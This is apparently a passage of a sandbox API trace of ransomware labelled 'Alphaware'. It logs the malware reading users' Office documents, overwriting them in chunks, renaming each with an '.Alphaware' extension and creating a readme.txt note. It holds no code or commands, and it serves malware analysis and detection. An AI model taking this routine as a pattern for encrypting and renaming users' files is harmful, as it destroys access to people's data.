lpFileName="C:\\Users\\kEecfMwgj\\Documents\\-mBHtuQ4.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\-mbhtuq4.docx"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac959be0, ftCreationTime.dwHighDateTime=0x1d91ba5, ftLastAccessTime.dwLowDateTime=0xcaa74f80, ftLastAccessTime.dwHighDateTime=0x1d95b64, ftLastWriteTime.dwLowDateTime=0x8315dda0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xcbc8)) returned 1 [0082.018] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0082.018] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\-mBHtuQ4.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\-mbhtuq4.docx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\-mBHtuQ4.docx.Alphaware" (normalized: "c:\\users\\keecfmwgj\\documents\\-mbhtuq4.docx.alphaware")) returned 1 [0082.019] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea48) returned 1 [0082.020] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\readme.txt" (normalized: "c:\\users\\keecfmwgj\\documents\\readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0082.020] GetFileType (hFile=0x254) returned 0x1 [0082.020] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9b8) returned 1 [0082.020] GetFileType (hFile=0x254) returned 0x1 [0082.022] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\1dc7CK 8O2M4jV0-v99j.doc", dwFileAttributes=0x80) returned 1 [0082.022] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0082.022] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\1dc7CK 8O2M4jV0-v99j.doc" (normalized: "c:\\users\\keecfmwgj\\documents\\1dc7ck 8o2m4jv0-v99j.doc"), fInfoLevelId=0x0, lpFileInformation=0x23fbb90 | out: lpFileInformation=0x23fbb90*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x77a3b930, ftCreationTime.dwHighDateTime=0x1d96bc8, ftLastAccessTime.dwLowDateTime=0xea143ce0, ftLastAccessTime.dwHighDateTime=0x1d96eae, ftLastWriteTime.dwLowDateTime=0xea143ce0, ftLastWriteTime.dwHighDateTime=0x1d96eae, nFileSizeHigh=0x0, nFileSizeLow=0x4787)) returned 1 [0082.022] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0082.022] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0082.022] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\1dc7CK 8O2M4jV0-v99j.doc" (normalized: "c:\\users\\keecfmwgj\\documents\\1dc7ck 8o2m4jv0-v99j.doc"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0082.023] GetFileType (hFile=0x254) returned 0x1 [0082.023] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0082.023] GetFileType (hFile=0x254) returned 0x1 [0082.023] GetFileSize (in: hFile=0x254, lpFileSizeHigh=0x23ec08 | out: lpFileSizeHigh=0x23ec08*=0x0) returned 0x4787 [0082.023] ReadFile (in: hFile=0x254, lpBuffer=0x23fbe28, nNumberOfBytesToRead=0x4787, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x23fbe28*, lpNumberOfBytesRead=0x23eb38*=0x4787, lpOverlapped=0x0) returned 1 [0082.024] CloseHandle (hObject=0x254) returned 1 [0082.135] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0082.135] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\1dc7CK 8O2M4jV0-v99j.doc" (normalized: "c:\\users\\keecfmwgj\\documents\\1dc7ck 8o2m4jv0-v99j.doc"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0082.136] GetFileType (hFile=0x254) returned 0x1 [0082.136] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0082.136] GetFileType (hFile=0x254) returned 0x1 [0082.137] WriteFile (in: hFile=0x254, lpBuffer=0x24ab2b8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x24ab2b8*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0082.138] WriteFile (in: hFile=0x254, lpBuffer=0x24ab2b8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x24ab2b8*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0082.138] WriteFile (in: hFile=0x254, lpBuffer=0x24ab2b8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x24ab2b8*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0082.138] WriteFile (in: hFile=0x254, lpBuffer=0x24ab2b8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x24ab2b8*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0082.139] WriteFile (in: hFile=0x254, lpBuffer=0x24ab2b8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x24ab2b8*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0082.139] WriteFile (in: hFile=0x254, lpBuffer=0x24ab2b8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea18, lpOverlapped=0x0 | out: lpBuffer=0x24ab2b8*, lpNumberOfBytesWritten=0x23ea18*=0x1000, lpOverlapped=0x0) returned 1 [0082.139] WriteFile (in: hFile=0x254, lpBuffer=0x24ab2b8*, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x24ab2b8*, lpNumberOfBytesWritten=0x23e9f8*=0x34, lpOverlapped=0x0) returned 1 [0082.139] CloseHandle (hObject=0x254) returned 1 [0082.141] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0082.141] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\1dc7CK 8O2M4jV0-v99j.doc" (normalized: "c:\\users\\keecfmwgj\\documents\\1dc7ck 8o2m4jv0-v99j.doc"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77a3b930, ftCreationTime.dwHighDateTime=0x1d96bc8, ftLastAccessTime.dwLowDateTime=0xea143ce0, ftLastAccessTime.dwHighDateTime=0x1d96eae, ftLastWriteTime.dwLowDateTime=0x8328e8a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x6034)) returned 1 [0082.141] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0082.141] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\1dc7CK 8O2M4jV0-v99j.doc" (normalized: "c:\\users\\keecfmwgj\\documents\\1dc7ck 8o2m4jv0-v99j.doc"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\1dc7CK 8O2M4jV0-v99j.doc.Alphaware" (normalized: "c:\\users\\keecfmwgj\\documents\\1dc7ck 8o2m4jv0-v99j.doc.alphaware")) returned 1 [0082.144] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\2Ahm.xlsx", nBufferLength=0x105, lpBuffer=0x23e7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\2Ahm.xlsx", lpFilePart=0x0) returned 0x26 [0082.144] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\2Ahm.xlsx", dwFileAttributes=0x80) returned 1 [0082.144] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0082.144] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\2Ahm.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\2ahm.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x24ac6e0 | out: lpFileInformation=0x24ac6e0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xde85d950, ftCreationTime.dwHighDateTime=0x1d9653b, ftLastAccessTime.dwLowDateTime=0x9314d360, ftLastAccessTime.dwHighDateTime=0x1d96da4, ftLastWriteTime.dwLowDateTime=0x9314d360, ftLastWriteTime.dwHighDateTime=0x1d96da4, nFileSizeHigh=0x0, nFileSizeLow=0xa845)) returned 1 [0082.144] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0082.144] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\2Ahm.xlsx", nBufferLength=0x105, lpBuffer=0x23e570, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\2Ahm.xlsx", lpFilePart=0x0) returned 0x26 [0082.144] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0082.144] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\2Ahm.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\2ahm.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0082.145] GetFileType (hFile=0x254) returned 0x1 [0082.145] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0082.145] GetFileType (hFile=0x254) returned 0x1 [0082.145] GetFileSize (in: hFile=0x254, lpFileSizeHigh=0x23ec08 | out: lpFileSizeHigh=0x23ec08*=0x0) returned 0xa845 [0082.145] ReadFile (in: hFile=0x254, lpBuffer=0x24ac8f8, nNumberOfBytesToRead=0xa845, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x24ac8f8*, lpNumberOfBytesRead=0x23eb38*=0xa845, lpOverlapped=0x0) returned 1 [0082.146] CloseHandle (hObject=0x254) returned 1 [0082.209] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0082.209] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\2Ahm.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\2ahm.xlsx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0082.210] GetFileType (hFile=0x254) returned 0x1 [0082.211] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0082.211] GetFileType (hFile=0x254) returned 0x1 [0082.211] WriteFile (in: hFile=0x254, lpBuffer=0x2552ab8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2552ab8*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0082.212] WriteFile (in: hFile=0x254, lpBuffer=0x2552ab8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2552ab8*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0082.213] WriteFile (in: hFile=0x254, lpBuffer=0x2552ab8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2552ab8*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0082.213] WriteFile (in: hFile=0x254, lpBuffer=0x2552ab8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2552ab8*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0082.213] WriteFile (in: hFile=0x254, lpBuffer=0x2552ab8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2552ab8*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0082.214] WriteFile (in: hFile=0x254, lpBuffer=0x2552ab8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2552ab8*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0082.214] WriteFile (in: hFile=0x254, lpBuffer=0x2552ab8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2552ab8*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0082.215] WriteFile (in: hFile=0x254, lpBuffer=0x2552ab8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2552ab8*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0082.215] WriteFile (in: hFile=0x254, lpBuffer=0x2552ab8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2552ab8*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0082.215] WriteFile (in: hFile=0x254, lpBuffer=0x2552ab8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2552ab8*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0082.215] WriteFile (in: hFile=0x254, lpBuffer=0x2552ab8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2552ab8*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0082.216] WriteFile (in: hFile=0x254, lpBuffer=0x2552ab8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2552ab8*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0082.216] WriteFile (in: hFile=0x254, lpBuffer=0x2552ab8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2552ab8*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0082.216] WriteFile (in: hFile=0x254, lpBuffer=0x2552ab8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea18, lpOverlapped=0x0 | out: lpBuffer=0x2552ab8*, lpNumberOfBytesWritten=0x23ea18*=0x1000, lpOverlapped=0x0) returned 1 [0082.217] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0082.217] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\2Ahm.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\2ahm.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xde85d950, ftCreationTime.dwHighDateTime=0x1d9653b, ftLastAccessTime.dwLowDateTime=0x9314d360, ftLastAccessTime.dwHighDateTime=0x1d96da4, ftLastWriteTime.dwLowDateTime=0x8334cf80, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xe134)) returned 1 [0082.217] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0082.217] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\2Ahm.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\2ahm.xlsx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\2Ahm.xlsx.Alphaware" (normalized: "c:\\users\\keecfmwgj\\documents\\2ahm.xlsx.alphaware")) returned 1 [0082.218] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\4A87C_8NPb.pps", dwFileAttributes=0x80) returned 1 [0082.218] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0082.218] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\4A87C_8NPb.pps" (normalized: "c:\\users\\keecfmwgj\\documents\\4a87c_8npb.pps"), fInfoLevelId=0x0, lpFileInformation=0x25554b8 | out: lpFileInformation=0x25554b8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x63bc3f80, ftCreationTime.dwHighDateTime=0x1d96ad5, ftLastAccessTime.dwLowDateTime=0xc3b83e00, ftLastAccessTime.dwHighDateTime=0x1d96d16, ftLastWriteTime.dwLowDateTime=0xc3b83e00, ftLastWriteTime.dwHighDateTime=0x1d96d16, nFileSizeHigh=0x0, nFileSizeLow=0x17f49)) returned 1 [0082.218] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0082.218] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0082.218] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\4A87C_8NPb.pps" (normalized: "c:\\users\\keecfmwgj\\documents\\4a87c_8npb.pps"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0082.219] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0082.219] ReadFile (in: hFile=0x254, lpBuffer=0x1271a0f0, nNumberOfBytesToRead=0x17f49, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x1271a0f0*, lpNumberOfBytesRead=0x23eb38*=0x17f49, lpOverlapped=0x0) returned 1 [0082.259] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0082.259] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\4A87C_8NPb.pps" (normalized: "c:\\users\\keecfmwgj\\documents\\4a87c_8npb.pps"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0082.261] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0082.266] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0082.266] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\4A87C_8NPb.pps" (normalized: "c:\\users\\keecfmwgj\\documents\\4a87c_8npb.pps"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63bc3f80, ftCreationTime.dwHighDateTime=0x1d96ad5, ftLastAccessTime.dwLowDateTime=0xc3b83e00, ftLastAccessTime.dwHighDateTime=0x1d96d16, ftLastWriteTime.dwLowDateTime=0x833bf3a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1ffe0)) returned 1 [0082.266] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0082.266] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\4A87C_8NPb.pps" (normalized: "c:\\users\\keecfmwgj\\documents\\4a87c_8npb.pps"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\4A87C_8NPb.pps.Alphaware" (normalized: "c:\\users\\keecfmwgj\\documents\\4a87c_8npb.pps.alphaware")) returned 1 [0082.267] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\ac gZ.docx", dwFileAttributes=0x80) returned 1 [0082.267] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0082.267] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\ac gZ.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\ac gz.docx"), fInfoLevelId=0x0, lpFileInformation=0x25d2a68 | out: lpFileInformation=0x25d2a68*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xac1bd690, ftCreationTime.dwHighDateTime=0x1d8edc7, ftLastAccessTime.dwLowDateTime=0xd4054800, ftLastAccessTime.dwHighDateTime=0x1d8f559, ftLastWriteTime.dwLowDateTime=0xd4054800, ftLastWriteTime.dwHighDateTime=0x1d8f559, nFileSizeHigh=0x0, nFileSizeLow=0xff7f)) returned 1 [0082.268] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0082.268] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0082.268] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\ac gZ.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\ac gz.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0082.268] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0082.269] ReadFile (in: hFile=0x254, lpBuffer=0x25d2c98, nNumberOfBytesToRead=0xff7f, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x25d2c98*, lpNumberOfBytesRead=0x23eb38*=0xff7f, lpOverlapped=0x0) returned 1 [0082.383] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\ac gZ.docx", nBufferLength=0x105, lpBuffer=0x23e4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\ac gZ.docx", lpFilePart=0x0) returned 0x27 [0082.383] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0082.384] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\ac gZ.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\ac gz.docx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0082.385] GetFileType (hFile=0x254) returned 0x1 [0082.385] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0082.385] GetFileType (hFile=0x254) returned 0x1 [0082.386] WriteFile (in: hFile=0x254, lpBuffer=0x24a4d40*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x24a4d40*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0082.387] WriteFile (in: hFile=0x254, lpBuffer=0x24a4d40*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x24a4d40*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0082.387] WriteFile (in: hFile=0x254, lpBuffer=0x24a4d40*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x24a4d40*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0082.388] WriteFile (in: hFile=0x254, lpBuffer=0x24a4d40*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x24a4d40*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0082.388] WriteFile (in: hFile=0x254, lpBuffer=0x24a4d40*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x24a4d40*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0082.388] WriteFile (in: hFile=0x254, lpBuffer=0x24a4d40*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x24a4d40*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0082.389] WriteFile (in: hFile=0x254, lpBuffer=0x24a4d40*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x24a4d40*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0082.389] WriteFile (in: hFile=0x254, lpBuffer=0x24a4d40*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x24a4d40*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0082.389] WriteFile (in: hFile=0x254, lpBuffer=0x24a4d40*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x24a4d40*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0082.389] WriteFile (in: hFile=0x254, lpBuffer=0x24a4d40*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x24a4d40*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0082.390] WriteFile (in: hFile=0x254, lpBuffer=0x24a4d40*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x24a4d40*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0082.390] WriteFile (in: hFile=0x254, lpBuffer=0x24a4d40*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x24a4d40*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0082.390] WriteFile (in: hFile=0x254, lpBuffer=0x24a4d40*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x24a4d40*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0082.391] WriteFile (in: hFile=0x254, lpBuffer=0x24a4d40*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x24a4d40*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0082.391] WriteFile (in: hFile=0x254, lpBuffer=0x24a4d40*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x24a4d40*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0082.391] WriteFile (in: hFile=0x254, lpBuffer=0x24a4d40*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x24a4d40*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0082.392] WriteFile (in: hFile=0x254, lpBuffer=0x24a4d40*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x24a4d40*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0082.392] WriteFile (in: hFile=0x254, lpBuffer=0x24a4d40*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x24a4d40*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0082.392] WriteFile (in: hFile=0x254, lpBuffer=0x24a4d40*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x24a4d40*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0082.393] WriteFile (in: 